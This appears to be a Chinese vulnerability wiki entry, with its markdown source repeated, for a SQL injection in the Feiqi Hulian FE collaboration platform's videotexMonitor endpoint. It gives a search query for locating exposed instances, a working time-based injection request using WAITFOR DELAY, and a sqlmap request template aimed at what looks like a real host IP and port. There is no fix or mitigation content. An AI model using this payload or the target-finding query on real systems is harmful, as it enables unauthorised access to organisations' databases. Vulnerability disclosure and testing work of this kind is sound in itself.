fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台videotexMonitor存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台videotexMonitor存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /cooperate/videotexMonitor.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

master_key=111&flowcode=1111%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&dialogid=11111

sqlmap

POST /cooperate/videotexMonitor.js%70 HTTP/1.1
Host: 14.123.236.201:8000
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

master_key=111&flowcode=1111&dialogid=11111

原文: https://www.yuque.com/xiaokp7/ocvun2/rlpnrzkd14br5r9t

# 飞企互联FE业务协作平台videotexMonitor存在SQL注入漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台videotexMonitor存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/YFDxqVCU24RA2mlV/1699089816407-bde9e92a-e1f9-4241-bfde-6f8d413f338e-583739.png)

# 四、漏洞复现
```
POST /cooperate/videotexMonitor.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

master_key=111&flowcode=1111%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&dialogid=11111
```
![image.png](./img/YFDxqVCU24RA2mlV/1705070489287-1c455948-e1ef-406d-8764-5ead7a1fdc43-288321.png)
sqlmap
```
POST /cooperate/videotexMonitor.js%70 HTTP/1.1
Host: 14.123.236.201:8000
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

master_key=111&flowcode=1111&dialogid=11111
```
![image.png](./img/YFDxqVCU24RA2mlV/1705070653080-c9d88677-61b8-46b2-b5b5-ed3cada13309-111006.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rlpnrzkd14br5r9t>